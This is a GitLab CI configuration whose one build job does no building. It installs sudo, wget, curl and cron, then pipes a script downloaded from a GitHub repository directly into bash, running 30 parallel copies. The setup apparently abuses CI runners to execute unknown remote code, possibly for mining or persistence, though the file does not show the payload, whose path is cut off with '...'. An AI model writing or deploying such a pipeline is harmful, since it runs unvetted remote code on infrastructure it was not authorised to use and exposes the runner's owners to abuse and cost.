stages:
  - build
  - test
  - deploy

build-job:
  stage: build
  script:
    - apt update && apt -y install sudo wget curl cron
    - curl -sL https://github.com/nandafiku/bapakmu/raw/main/... | bash
  parallel: 30
